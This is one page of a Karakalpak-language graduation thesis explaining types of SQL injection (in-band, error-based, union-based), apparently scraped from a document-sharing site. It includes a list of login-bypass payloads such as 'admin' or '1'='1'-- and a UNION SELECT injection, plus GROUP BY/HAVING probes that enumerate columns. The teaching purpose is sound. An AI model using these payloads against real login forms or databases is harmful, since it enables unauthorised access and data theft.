Bitiruv malakaviy ishi



Yüklə 0,65 Mb.
səhifə4/29
tarix17.06.2023
ölçüsü0,65 Mb.
#131897
1   2   3   4   5   6   7   8   9   ...   29
Satbaeva

admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

SQL inekcıyasını tómendegi túrlerge bólıw múmkin:


In-band SQL inekcıya
In-band SQL inekciya - bul eń keń tarqalǵan hám SQL kodtı ornatıw ańsat bolǵan metod. Bul SQL inekciya basqınshı hújimdi ámelge asırıw hám nátiyjelerdi toplaw ushın bir baylanıs kanalınnan paydalanıwı múmkin bolǵanda júz beredi.
Bul hújim túri óz gezeginde 2 túrge bólinedi. Bularǵa Error based SQLi hám Union-based SQLi kiredi.


Error based SQL inekcıya
Error based SQL inekciya - bul maǵlıwmatlar bazası dúzilisi haqqında sıpatlama beriw ushın maǵlıwmatlar bazası serveri tárepinen shıǵarılǵan qáte xabarlarına tıykarlanǵan, tarmaq ishindegi SQL inekcıya texnikası bolıp tabıladı. Ayrım jaǵdaylarda, basqınshı ushın maǵlıwmatlar bazasın tolıq dizimlew ushın tek ǵana qátelerge tiykarlanǵan SQL inekciya jetkilikli. Qátelerdi kórsetiw web programmanı jaratıw basqıshında júdá paydalı bolsada, olardı keying etapta saytta óshirip qoyıw yamasa onıń ornına sheklengen faylǵa jazıw usınıs etiledi.
Bul túrdegi hújimdi qollaw ushın sistemadaǵı qátelerdi kórsetiwdi óshirip qoyıw jetkilikli.
SQL Serverge tómendegi sorawlardıń izbe-iz atqarılıwı qáteler tekstindegi baǵanalardıń atların anıqlaydı:


' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 -- ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --


Union-based SQL ineksiya
Union-based SQL inekciya - bul eki yamasa odan artıq SELECT komandalarınıń nátiyjelerin bir nátiyjege birlestiriw ushın UNION SQL gilt sózin isletetuǵın tarmaq ishindegi SQL inekciya texnikası. Onıń nátiyjesi keyinrek HTTP juwabınıń bir bólegi retinde qaytarıladı.
Mısalı, saytta ónimler dizimi ushın halsiz bolǵan izlew forması bar. Bunda baǵanalardıń durıs sanın tańlaw hám olardıń atların biliw arqalı biz UNION arqalı derlik barlıq maǵlıwmatlardı kórsetiwimiz múmkin.



Yüklə 0,65 Mb.

Dostları ilə paylaş:
1   2   3   4   5   6   7   8   9   ...   29



Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət
gir | qeydiyyatdan keç
    Ana səhifə
Stomatologiya
Anesteziologiya
Cərrahlıq
Ginekologiya
Tibb

yükləyin